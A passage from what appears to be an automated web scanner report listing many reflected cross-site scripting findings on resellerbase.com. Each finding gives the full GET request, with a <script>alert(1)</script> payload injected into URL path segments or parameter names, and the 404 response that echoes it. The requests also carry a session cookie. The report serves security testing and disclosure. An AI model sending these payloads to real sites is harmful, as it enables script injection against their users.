Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29cefb9<script>alert(1)</script>104fe8229fe/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2016. http://www.resellerbase.com/detail/29/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2afc5<script>alert(1)</script>2fd305bed36 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes2afc5<script>alert(1)</script>2fd305bed36/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes2afc5<script>alert(1)</script>2fd305bed36/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2017. http://www.resellerbase.com/detail/29/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 85924<script>alert(1)</script>6a24f622b70 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos85924<script>alert(1)</script>6a24f622b70/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos85924<script>alert(1)</script>6a24f622b70/ was not found on this server.</p>
...[SNIP]...

2.2018. http://www.resellerbase.com/detail/29/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e4422<script>alert(1)</script>8b4716c3317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/?e4422<script>alert(1)</script>8b4716c3317=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/?e4422<script>alert(1)</script>8b4716c3317=1 was not found on this server.</p>
...[SNIP]...

2.2019. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc6c2<script>alert(1)</script>c561bdc5691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfc6c2<script>alert(1)</script>c561bdc5691/29/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfc6c2<script>alert(1)</script>c561bdc5691/29/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2020. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 836aa<script>alert(1)</script>b8b2868f203 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29836aa<script>alert(1)</script>b8b2868f203/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2021. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 829f5<script>alert(1)</script>b70f80f62dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes829f5<script>alert(1)</script>b70f80f62dd/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes829f5<script>alert(1)</script>b70f80f62dd/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2022. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8a32d<script>alert(1)</script>32f5d861b9f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos8a32d<script>alert(1)</script>32f5d861b9f/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos8a32d<script>alert(1)</script>32f5d861b9f/images/ was not found on this server.</p>
...[SNIP]...

2.2023. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e834e<script>alert(1)</script>15928abc0b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/imagese834e<script>alert(1)</script>15928abc0b5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/imagese834e<script>alert(1)</script>15928abc0b5/ was not found on this server.</p>
...[SNIP]...

2.2024. http://www.resellerbase.com/detail/29/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dff1c<script>alert(1)</script>5ed5e28a9a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/?dff1c<script>alert(1)</script>5ed5e28a9a5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/?dff1c<script>alert(1)</script>5ed5e28a9a5=1 was not found on this server.</p>
...[SNIP]...

2.2025. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9ec01<script>alert(1)</script>b4c37190058 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9ec01<script>alert(1)</script>b4c37190058/29/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9ec01<script>alert(1)</script>b4c37190058/29/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2026. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 685ed<script>alert(1)</script>c52af3ce70f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29685ed<script>alert(1)</script>c52af3ce70f/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29685ed<script>alert(1)</script>c52af3ce70f/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2027. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3c6a0<script>alert(1)</script>d18c0ba143b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes3c6a0<script>alert(1)</script>d18c0ba143b/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes3c6a0<script>alert(1)</script>d18c0ba143b/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2028. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 29504<script>alert(1)</script>92e29075490 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos29504<script>alert(1)</script>92e29075490/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos29504<script>alert(1)</script>92e29075490/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2029. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 887f9<script>alert(1)</script>53bebb9d882 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images887f9<script>alert(1)</script>53bebb9d882/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images887f9<script>alert(1)</script>53bebb9d882/rating/ was not found on this server.</p>
...[SNIP]...

2.2030. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 87b50<script>alert(1)</script>b0bccd71d61 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating87b50<script>alert(1)</script>b0bccd71d61/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating87b50<script>alert(1)</script>b0bccd71d61/ was not found on this server.</p>
...[SNIP]...

2.2031. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 640fb<script>alert(1)</script>f5e61753262 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/rating/?640fb<script>alert(1)</script>f5e61753262=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/rating/?640fb<script>alert(1)</script>f5e61753262=1 was not found on this server.</p>
...[SNIP]...

2.2032. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48faa<script>alert(1)</script>dd80c9993a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail48faa<script>alert(1)</script>dd80c9993a7/29/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail48faa<script>alert(1)</script>dd80c9993a7/29/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2033. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f1a5<script>alert(1)</script>465fd9be89a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/295f1a5<script>alert(1)</script>465fd9be89a/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/295f1a5<script>alert(1)</script>465fd9be89a/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2034. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ec18d<script>alert(1)</script>3439eade4d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themesec18d<script>alert(1)</script>3439eade4d/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themesec18d<script>alert(1)</script>3439eade4d/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.2035. http://www.resellerbase.com/detail/29/themes/kosmos/images/rating/4.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6ba89<script>alert(1)</script>33bfcbb7b33 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos6ba89<script>alert(1)</script>33bfcbb7b33/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
